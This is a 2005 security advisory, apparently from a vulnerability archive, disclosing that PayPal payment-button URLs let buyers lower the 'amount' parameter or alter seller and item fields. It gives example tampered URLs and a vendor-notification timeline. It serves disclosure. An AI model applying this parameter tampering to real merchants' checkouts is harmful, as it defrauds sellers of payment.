Search...

paypalFlaw.txt

2005-08-14T00:00:00

ID PACKETSTORM:39358
Type packetstorm
Reporter Lostmon
Modified 2005-08-14T00:00:00

Description

                                        
                                            `##############################################  
PayPal 'butons' price manipulation.  
vendor url:https://www.paypal.com/  
http://lostmon.blogspot.com/2005/05/  
paypal-arbitrary-price-manipulation.html  
vendor notify: yes exploit available: yes  
Discovered by FalconDeOro(1) and Lostmon(2)   
##############################################  
  
PayPal buttons are prone to price manipulation.  
all stores based on PayPal buttons are posible   
vulnerables to this flaw.  
  
  
##########################  
code example of a button  
##########################  
the proof is based on this form:  
  
https://www.paypal.com/us/cgi-bin/webscr?cmd=p/xcl/rec/options-help-outside  
  
in the exmple of explotation we used "PayPal price manipulation kit "  
program to shop.  
This is Non existent product...  
  
the link of the button for shopping have this url:  
(1)  
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick  
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+  
kit&item_number=1&amount=19.90&no_shipping=1&return  
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15  
  
  
this is the normal price for the product (19.90$) but...   
if we change 'amount' variable to 0.01 the product now cost 0.01$  
  
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick  
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+  
kit&item_number=1&amount=0.01&no_shipping=1&return  
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15  
  
another way to exploiting this situation:  
  
(2)  
this other example coming from a stored based on paypal:  
  
https://www.paypal.com/cart/add=1&business=[EMAIL-Bussines]  
&item_name=PayPal+price+manipulation+ kit&item_number=  
7&return=[SITE SUBMIT]&cancel_return=[SITE RETURN]&amount=[PRICE]&shipping=0  
&shipping2=0&handling=0&rm=2&custom=1¤cy_code=USD  
  
if we look we can change not only the price , we can change the email account  
name of product, and other details.  
for shopping you need an account on PayPal.  
  
#############  
timeline:  
#############  
  
discovered: 14 may 2005  
vendor notify: 25 may 2005  
Vendor response: 26 may 2005  
disclosure: 27 may 2005  
  
  
################### End ####################  
  
thnx to estrella to be my ligth  
thnx to icaro he is my support  
Thnx to FalconDeOro ... patience.  
thnx to all http://www.osvdb.org Team  
thnx to all who day after day support me !!!  
  
contact to FalconDeOro  
(falcondeoro@gmail.com)  
http://falcondeoro.blogspot.com  
  
--   
atentamente:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Data Mangler of: http://www.osvdb.org  
--  
La curiosidad es lo que hace mover la mente  
`

JSON Vulners Source

Initial Source

{"sourceHref": "https://packetstormsecurity.com/files/download/39358/paypalFlaw.txt", "sourceData": "`############################################## \nPayPal 'butons' price manipulation. \nvendor url:https://www.paypal.com/ \nhttp://lostmon.blogspot.com/2005/05/ \npaypal-arbitrary-price-manipulation.html \nvendor notify: yes exploit available: yes \nDiscovered by FalconDeOro(1) and Lostmon(2) \n############################################## \n \nPayPal buttons are prone to price manipulation. \nall stores based on PayPal buttons are posible \nvulnerables to this flaw. \n \n \n########################## \ncode example of a button \n########################## \nthe proof is based on this form: \n \nhttps://www.paypal.com/us/cgi-bin/webscr?cmd=p/xcl/rec/options-help-outside \n \nin the exmple of explotation we used \"PayPal price manipulation kit \" \nprogram to shop. \nThis is Non existent product... \n \nthe link of the button for shopping have this url: \n(1) \nhttps://www.paypal.com/cgi-bin/webscr?cmd=_xclick \n&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ \nkit&item_number=1&amount=19.90&no_shipping=1&return \n=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15 \n \n \nthis is the normal price for the product (19.90$) but... \nif we change 'amount' variable to 0.01 the product now cost 0.01$ \n \nhttps://www.paypal.com/cgi-bin/webscr?cmd=_xclick \n&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ \nkit&item_number=1&amount=0.01&no_shipping=1&return \n=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15 \n \nanother way to exploiting this situation: \n \n(2) \nthis other example coming from a stored based on paypal: \n \nhttps://www.paypal.com/cart/add=1&business=[EMAIL-Bussines] \n&item_name=PayPal+price+manipulation+ kit&item_number= \n7&return=[SITE SUBMIT]&cancel_return=[SITE RETURN]&amount=[PRICE]&shipping=0 \n&shipping2=0&handling=0&rm=2&custom=1\u00a4cy_code=USD \n \nif we look we can change not only the price , we can change the email account \nname of product, and other details. \nfor shopping you need an account on PayPal. \n \n############# \ntimeline: \n############# \n \ndiscovered: 14 may 2005 \nvendor notify: 25 may 2005 \nVendor response: 26 may 2005 \ndisclosure: 27 may 2005 \n \n \n################### End #################### \n \nthnx to estrella to be my ligth \nthnx to icaro he is my support \nThnx to FalconDeOro ... patience. \nthnx to all http://www.osvdb.org Team \nthnx to all who day after day support me !!! \n \ncontact to FalconDeOro \n(falcondeoro@gmail.com) \nhttp://falcondeoro.blogspot.com \n \n-- \natentamente: \nLostmon (lostmon@gmail.com) \nWeb-Blog: http://lostmon.blogspot.com/ \nData Mangler of: http://www.osvdb.org \n-- \nLa curiosidad es lo que hace mover la mente \n`\n", "edition": 1, "references": [], "modified": "2005-08-14T00:00:00", "hash": "0fe505c1fe2ba6789ae7830b395c3ed73a03e8dfc1f8c8bdbe265c6a2aef2112", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/39358/paypalFlaw.txt.html", "description": "", "id": "PACKETSTORM:39358", "reporter": "Lostmon", "lastseen": "2016-11-03T10:18:56", "published": "2005-08-14T00:00:00", "enchantments": {"score": {"value": -0.6, "vector": "NONE", "modified": "2016-11-03T10:18:56"}, "dependencies": {"references": [], "modified": "2016-11-03T10:18:56"}, "vulnersScore": -0.6}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "paypalFlaw.txt", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "c6d45e4b564abba9fc5bf398e6ce3421", "key": "href"}, {"hash": "7a1280d607f087b4ad0bbde327dda871", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "7a1280d607f087b4ad0bbde327dda871", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "3e185b1875e415838556ecb532deffa0", "key": "reporter"}, {"hash": "3d2a9c524da76ce40e5d3dd358ec0250", "key": "sourceData"}, {"hash": "0ffb0924e4c014571158b10de7658e25", "key": "sourceHref"}, {"hash": "3ef5b13a2898c2f166c0faabbdb4ad04", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}